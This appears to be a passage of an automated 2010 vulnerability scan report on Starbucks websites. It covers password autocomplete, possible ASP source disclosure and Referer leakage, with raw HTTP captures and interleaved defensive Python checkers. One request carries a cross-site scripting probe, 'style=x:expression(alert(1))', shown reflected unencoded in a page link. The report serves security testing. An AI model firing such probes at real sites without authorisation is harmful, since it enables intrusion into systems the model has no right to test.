Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:16:43 GMT
Connection: close
Content-Length: 48282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

7.3. http://www.starbucks.com/blog/612/good-books-on-the-starbucks-digital-network

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/612/good-books-on-the-starbucks-digital-network

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /blog/612/good-books-on-the-starbucks-digital-network HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:16:03 GMT
Connection: close
Content-Length: 41705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

7.4. http://www.starbucks.com/blog/615/i-m-dreaming-of-cranberry-bliss-bar

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/615/i-m-dreaming-of-cranberry-bliss-bar

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /blog/615/i-m-dreaming-of-cranberry-bliss-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:10 GMT
Connection: close
Content-Length: 39146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

7.5. http://www.starbucks.com/blog/616/thanksgiving-blend-fit-for-a-feast

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/616/thanksgiving-blend-fit-for-a-feast

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /blog/616/thanksgiving-blend-fit-for-a-feast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:10 GMT
Connection: close
Content-Length: 39234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...
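The finding above is one of several of the same kind in this report, so it is worth having a repeatable check rather than reading each response by hand. The following is an added example, not part of the original report or of the scanned site: it walks an HTML response with the standard-library parser and lists every password field that neither it nor its enclosing form has opted out of autocomplete, then shows the field-level fix. The sample markup is constructed from the sign-in form fragment in the response above; only the password input shown there is reproduced.

```python
from html.parser import HTMLParser


class PasswordAutocompleteScanner(HTMLParser):
    """Record password fields that a browser may offer to remember: neither the
    <input> nor its enclosing <form> carries autocomplete="off"."""

    def __init__(self):
        super().__init__()
        self.form_action = None      # action of the <form> currently open
        self.form_opts_out = False   # enclosing <form autocomplete="off">?
        self.findings = []           # (form action, field name) pairs

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.form_action = a.get("action", "")
            self.form_opts_out = a.get("autocomplete", "").lower() == "off"
        elif tag == "input" and a.get("type", "").lower() == "password":
            field_opts_out = a.get("autocomplete", "").lower() == "off"
            if not (field_opts_out or self.form_opts_out):
                self.findings.append((self.form_action, a.get("name", "")))

    # <input ... /> is self-closing: HTMLParser routes it through handle_starttag
    # and then handle_endtag, so the form bookkeeping here only needs </form>.
    def handle_endtag(self, tag):
        if tag == "form":
            self.form_action = None
            self.form_opts_out = False


def password_fields_with_autocomplete(html):
    """Return [(form_action, field_name)] for each password field open to autocomplete."""
    scanner = PasswordAutocompleteScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample modelled on the sign-in form fragment in the response above.
SIGN_IN_FORM = """
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
  <fieldset>
    <li><label for="Account_PassWord">Password</label>
        <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" /></li>
  </fieldset>
</form>
</div>
"""

# The same form with the field-level opt-out that the finding asks for.
SIGN_IN_FORM_FIXED = SIGN_IN_FORM.replace(
    'type="password"', 'type="password" autocomplete="off"')


if __name__ == "__main__":
    print("before:", password_fields_with_autocomplete(SIGN_IN_FORM))
    print("after: ", password_fields_with_autocomplete(SIGN_IN_FORM_FIXED))
```

The check honours either placement of the attribute (on the input or on the whole form). Keep the severity in perspective: current mainstream browsers ignore autocomplete="off" on login fields so that their password managers keep working, so the attribute only prevents the browser's own form-history caching of the credential, which is why the report rates the issue Low.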

8. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /include/LibJavaScript.js

Issue detail

The application appears to disclose some server-side source code written in ASP. In the response below the matched fragments are ASP.NET server-control expressions of the form <%=ddMonth.ClientID %> on commented-out lines of a static JavaScript file, which is consistent with code pasted from an .aspx page into LibJavaScript.js rather than with the server failing to process a script; what leaks is the names of server-side controls, not executable logic. Confirm the finding by checking whether any <% ... %> tag appears outside a JavaScript comment.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /include/LibJavaScript.js HTTP/1.1
Accept: */*
Referer: http://www.starbucksstore.com/?CCAID=SBPTPAHP1SHTB&Redir=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 06 Oct 2008 20:03:29 GMT
Accept-Ranges: bytes
ETag: "654ac299ee27c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:41 GMT
Content-Length: 6031


function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x
...[SNIP]...
"/" + theForm.ddYear;
       return SetBirthDate(theForm)
       return CheckDate(bDay, theForm)
           
           
                                       }

function SetBirthDate(theForm)
{
//var ddlMonthID = "<%=ddMonth.ClientID %>", ddDay = "<%=ddDay.ClientID %>", ddYear = "<%=ddYear.ClientID %>";
var BornDOB = "";
//var myMonthStr = parseInt(document.getElementById(ddMonth).value);
//var myDayStr = parseInt(document.getElementById(
...[SNIP]...
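A Tentative hit like the one above needs triage before it goes in a report: a server-side tag inside a JavaScript comment says something different from one the server actually failed to execute. The following is an added example, not code from the original report or from the scanned site: it finds ASP/ASP.NET and PHP template delimiters in a JavaScript body and classifies each by whether it sits inside a JS comment, using a line-oriented heuristic (a preceding //, or an open /* */ block). The first sample is constructed from the LibJavaScript.js excerpt in the response above; the second is a constructed counter-example showing what a real disclosure would look like.

```python
import re

# Server-side template delimiters that should never survive into a static .js file:
# classic ASP / ASP.NET <% ... %> (with the =, #, @ and : variants) and PHP <?php ... ?> / <?= ... ?>.
SERVER_TAG = re.compile(r"<%[=#@:]?.*?%>|<\?(?:php|=).*?\?>")
# A '//' that starts a line comment; the lookbehind skips the '//' inside URLs such as http://
LINE_COMMENT = re.compile(r"(?<![:\\])//")


def find_server_tags(js_text):
    """One record per server-side tag found, noting whether it sits in a JS comment.
    Heuristic, line by line: '//' earlier on the line, or a /* */ block still open."""
    records = []
    in_block = False
    for lineno, line in enumerate(js_text.splitlines(), 1):
        for m in SERVER_TAG.finditer(line):
            prefix = line[:m.start()]
            if in_block:
                in_comment = "*/" not in prefix          # still inside a block opened earlier
            else:
                in_comment = (bool(LINE_COMMENT.search(prefix))
                              or prefix.rfind("/*") > prefix.rfind("*/"))
            records.append({"line": lineno, "tag": m.group(0), "in_comment": in_comment})
        # Track block comments that run past the end of this line.
        if line.count("/*") > line.count("*/"):
            in_block = True
        elif line.count("*/") > line.count("/*"):
            in_block = False
    return records


def triage_source_disclosure(js_text):
    """Summarise a scanner hit as 'clean' (no tags), 'commented-out' (every tag is inside a
    JS comment, typically view code pasted into a static file) or 'live' (a tag outside any
    comment, i.e. the server really served source it should have executed)."""
    records = find_server_tags(js_text)
    if not records:
        verdict = "clean"
    elif all(r["in_comment"] for r in records):
        verdict = "commented-out"
    else:
        verdict = "live"
    return {"verdict": verdict, "matches": records}


# Constructed from the LibJavaScript.js excerpt in the response above.
SAMPLE_JS = """function SetBirthDate(theForm)
{
//var ddlMonthID = "<%=ddMonth.ClientID %>", ddDay = "<%=ddDay.ClientID %>", ddYear = "<%=ddYear.ClientID %>";
var BornDOB = "";
//var myMonthStr = parseInt(document.getElementById(ddMonth).value);
}
"""

# Constructed counter-example: the same expression outside a comment would be a real disclosure.
LIVE_JS = """/* helpers */
var ddlMonthID = "<%=ddMonth.ClientID %>";
"""


if __name__ == "__main__":
    for label, body in (("LibJavaScript.js excerpt", SAMPLE_JS), ("counter-example", LIVE_JS)):
        result = triage_source_disclosure(body)
        print(label, "->", result["verdict"], [(m["line"], m["tag"]) for m in result["matches"]])
```

For the excerpt on this page the verdict is commented-out: the control names ddMonth, ddDay and ddYear leak, but no server logic does, which supports leaving the confidence at Tentative and the severity at Low. A live verdict on a .aspx or .asp path, by contrast, means the handler mapping or permissions are wrong and the whole file is readable.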

9. Cross-domain Referer leakage
There are 12 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
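To turn the background above into a check that can be re-run against any captured response, the following added example (not part of the original report, and not code from the scanned site) collects the cross-domain link targets in a page, works out what Referer value a browser would send to each for the page URL in question, and separately flags links that copy the page URL, query string included, into one of their own parameters, the pattern of the AddThis share links in the instances that follow, which leak the query string as link content even when the browser withholds the Referer header. The referer logic goes one step beyond the report's text by covering both the no-referrer-when-downgrade behaviour that browsers defaulted to at the time and the strict-origin-when-cross-origin default current browsers apply. The page URL and HTML are constructed stand-ins modelled on the responses below.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit, urlunsplit


class LinkCollector(HTMLParser):
    """Gather every attribute value that makes the browser issue a request."""
    REQUEST_ATTRS = {"a": "href", "link": "href", "form": "action", "img": "src",
                     "script": "src", "iframe": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        wanted = self.REQUEST_ATTRS.get(tag)
        if wanted:
            for name, value in attrs:
                if name == wanted and value:
                    self.links.append(value)   # HTMLParser has already unescaped &amp;


def cross_domain_links(page_url, html):
    """Absolute http(s) links whose host differs from the page's host."""
    host = urlsplit(page_url).hostname
    collector = LinkCollector()
    collector.feed(html)
    return [l for l in collector.links
            if urlsplit(l).scheme in ("http", "https") and urlsplit(l).hostname not in (None, host)]


def referer_for(page_url, target_url, policy="no-referrer-when-downgrade"):
    """Referer value a browser sends when a page at page_url requests target_url, or None.
    'no-referrer-when-downgrade' was the browser default when this report was written;
    'strict-origin-when-cross-origin' is the current default."""
    page, target = urlsplit(page_url), urlsplit(target_url)
    downgrade = page.scheme == "https" and target.scheme == "http"
    same_origin = (page.scheme, page.hostname, page.port) == (target.scheme, target.hostname, target.port)
    full = urlunsplit((page.scheme, page.netloc, page.path, page.query, ""))  # fragment is never sent
    origin = urlunsplit((page.scheme, page.netloc, "/", "", ""))
    if downgrade:
        return None
    if policy == "no-referrer-when-downgrade":
        return full
    if policy == "strict-origin-when-cross-origin":
        return full if same_origin else origin
    raise ValueError("unsupported policy: " + policy)


def links_embedding_page_query(page_url, links):
    """Cross-domain links carrying the page URL, query string included, as a parameter value."""
    page = urlsplit(page_url)
    hits = []
    for link in links:
        for _, value in parse_qsl(urlsplit(link).query, keep_blank_values=True):
            embedded = urlsplit(value)
            if embedded.hostname == page.hostname and embedded.query:
                hits.append(link)
                break
    return hits


PAGE_URL = "http://www.starbucks.com/?8af12=1"   # constructed stand-in for the scanner's query string

# Constructed excerpt modelled on the responses below (a handful of their cross-domain links).
SAMPLE_HTML = """
<a href="/menu">Menu</a>
<a href="http://www.facebook.com/starbucks">Find us on Facebook</a>
<a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?8af12=1"
   class="addthis_button_compact" title="Post to AddThis">Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
<img class="tracking" src="http://leadback.advertising.com/adcedge/lb?site=695501&amp;srvc=1" alt="" />
"""


def report(page_url=PAGE_URL, html=SAMPLE_HTML, policy="no-referrer-when-downgrade"):
    links = cross_domain_links(page_url, html)
    return {
        "query_in_page_url": bool(urlsplit(page_url).query),
        "cross_domain": links,
        "referer_sent": {l: referer_for(page_url, l, policy) for l in links},
        "embeds_page_query": links_embedding_page_query(page_url, links),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(key, value)
```

Under the 2010 default every one of the sample's five external targets receives the full page URL, query string included; under strict-origin-when-cross-origin they receive only http://www.starbucks.com/, but the AddThis link still carries the query string in its url= parameter, which is why the remediation is to keep sensitive data out of the query string rather than to rely on Referer behaviour.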


9.1. http://www.starbucks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains. Note that the AddThis share link below copies the request URL, query string included, into its url= parameter without encoding, so the query string reaches addthis.com as part of the link itself whether or not the browser sends a Referer header; the unencoded double quote in that reflected value also terminates the href attribute, which is the sink reported under 3.1.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=169adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=new0hf55b2avrbbgt3d0fz45; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:19:51 GMT
Content-Length: 41392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<dd id="get_flash"><a href="http://get.adobe.com/flashplayer/"><img src="/static/images/plugins/get_flashplayer.gif" alt="Get Flash" /></a><a href="http://get.adobe.com/flashplayer/">For an enhanced experience install flash</a>
...[SNIP]...
<li id="community_msi"><a href="http://www.mystarbucksidea.com">Share your ideas on <strong>
...[SNIP]...
<li id="community_facebook"><a href="http://www.facebook.com/starbucks">Find us on <strong>
...[SNIP]...
<li id="community_twitter"><a href="http://www.twitter.com/starbucks">Follow us on <strong>
...[SNIP]...
<h2><a href="http://www.starbucksstore.com/Tours/">Take a Taste Journey</a>
...[SNIP]...
<p style="background-color:#330000"><a href="http://www.starbucksstore.com/Tours/">Learn about the richness and complexity of our coffees & teas through our carefully selected coffee & tea tours.</a>
...[SNIP]...
<p><a href="http://starbucks.tekgroup.com/news/">See All News Headlines</a>
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=169adb style=x:expression(alert(1)) 21e0c039cae" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
